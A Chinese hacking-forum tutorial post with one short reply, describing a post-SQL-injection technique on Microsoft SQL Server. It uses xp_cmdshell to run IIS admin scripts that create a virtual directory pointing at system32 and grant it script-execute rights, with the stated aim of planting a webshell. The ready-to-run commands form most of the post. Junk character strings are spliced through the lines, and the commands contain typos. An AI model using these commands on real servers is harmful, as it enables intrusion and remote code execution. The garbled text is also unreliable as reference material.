返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
( E3 d- W& C; K' y4 s. f6 e
8 M1 y5 [2 e8 pexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'! {& M- d9 {2 X
建立虚拟目录win,指向c:\windows\system32
0 f$ V9 L- O+ X; rexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'5 k$ b! y/ z7 U" ]* m* c# H: m& h. R
让win句有解析asp脚本权限
% T% d5 O5 G0 s1 r& c2 Q3 _5 D6 b! {6 J: e  r! j6 Z5 Q4 R1 ~* w# A
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
! l  o1 H6 q( j6 }; N4 C, s删除虚拟目录。5 V" N: f4 g2 r2 E) l
找不到web绝对路径的一种解决办法," d: Y/ ^# S, ?2 U* R% ]8 F. v
4 F, m$ g! @2 A; y6 B/ u
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表